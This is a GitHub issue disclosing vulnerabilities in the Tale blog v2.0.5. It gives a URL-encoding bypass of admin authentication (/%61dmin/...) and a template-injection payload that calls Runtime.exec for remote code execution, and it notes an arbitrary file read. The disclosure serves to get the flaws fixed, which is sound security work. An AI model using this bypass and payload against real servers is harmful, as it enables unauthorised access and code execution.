Skip to content
This repository has been archived by the owner on May 18, 2024. It is now read-only.

There is a security problem with admin route verification, which leads to direct access without login #602

Open
Siebene opened this issue Jan 11, 2022 · 0 comments
Open

There is a security problem with admin route verification, which leads to direct access without login #602

Siebene opened this issue Jan 11, 2022 · 0 comments

Comments

@Siebene
Copy link

Siebene commented Jan 11, 2022

ezbypass,/%61dmin/api/logs
image

For post requests, you only need to configure the X-CSRF-TOKEN request header and the corresponding session
Therefore, an attacker can directly modify the template file to get rce.
image

And the template engine does not open the sandbox. it makes it particularly easy for attackers.
Just need to set the parameter content to
#set(in=new java.io.InputStreamReader(java.lang.Runtime::getRuntime().exec('xxx').getInputStream()))#set(buf=new java.io.BufferedReader(in))
Then visit the page.
(At the same time, this route /admin/api/template/save has a arbitrary file read)
Env:
Win10
JDK8u261
tale v2.0.5
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Siebene